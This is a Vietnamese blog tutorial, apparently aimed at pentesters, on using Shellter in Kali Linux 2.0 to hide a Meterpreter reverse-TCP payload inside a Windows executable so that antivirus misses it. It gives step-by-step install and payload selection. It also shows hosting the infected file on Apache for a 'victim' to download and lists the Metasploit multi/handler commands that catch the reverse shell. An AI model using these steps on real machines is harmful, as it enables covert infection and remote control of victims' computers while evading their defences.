Bypass Anti-Virus với Shellter trên Kali linux 2.0

Giới thiệu

Trên Phiên bản Kali Linux 1.0 chúng ta đã biết tới Veil-Evasion, một công cụ để Bypass AV khá mạnh với nhiều Payload tuy nhiên gần đây có một số Payload đã bị AV nhận diện được và một điều nữa là việc tải và cài đặt Veil-Evasion khá lâu. Sang phiên bản Kali 2.0, Shellter sẽ là một sự lựa chọn mới dành cho Pentester. Được ban hành trong năm 2015, cho đến hiện tại Shellter vẫn có thể bypass hầu hết các AV với tính năng mã hóa và giải mã đa hình, tỷ lệ bị phát hiện trên Virustotal là rất thấp thậm chí là không có.

Cách cài đặt và sử dụng

Tại cửa sổ Terminal: apt-get install shellter –> shellter sau đó click Install để bắt đầu cài đặt.

Bypass Anti-Virus với Shellter trên Kali linux 2.0

Bước tiếp ta nhập ‘A‘ để chọn chế độ Auto, M để tự tùy chỉnh và H để được hướng dẫn.

Bypass Anti-Virus với Shellter trên Kali linux 2.0

Sau khi nhập ‘A’ ta nhập tên file thực thi dạng EXE, file này phải được đặt cùng thư mục chạy Shellter, trong trường hợp này là /root/

Bypass Anti-Virus với Shellter trên Kali linux 2.0

Tiếp theo là chọn Payload. Đầu tiên ta nhập “L” để sử dụng danh sách Payload có ở trên sau đó nhập số thứ tự của Payload cần dùng rồi IP của Kali và cuối cùng là cổng kết nối ( mình chọn 4444 ).

Bypass Anti-Virus với Shellter trên Kali linux 2.0

Cuối cùng ta ấn Enter để kết thúc.

Bypass Anti-Virus với Shellter trên Kali linux 2.0

Bypass Anti-Virus với Shellter trên Kali linux 2.0

Sau khi tiêm mã độc vào file xong, ta copy vào thư mục /var/www/html/ rồi nhập service apache2 start để victim có thể truy cập và tải về file virus.

Bypass Anti-Virus với Shellter trên Kali linux 2.0

Ta vào sẵn Metasploit: use multi/handler –> set payload windows/meterpreter/reverse_tcp –> set lhost ‘IP của Kali’ –> 4444 –> exploit

Bypass Anti-Virus với Shellter trên Kali linux 2.0

Trên máy victim tải về và mở file virus.

Bypass Anti-Virus với Shellter trên Kali linux 2.0

Kali đã kết nối được tới máy Victim, giờ ta có thể làm nhiều việc đối với máy victim thông qua dòng lệnh.

Bypass Anti-Virus với Shellter trên Kali linux 2.0

Đây là kết quả test trên Virustotal.com

Bypass Anti-Virus với Shellter trên Kali linux 2.0

whitehat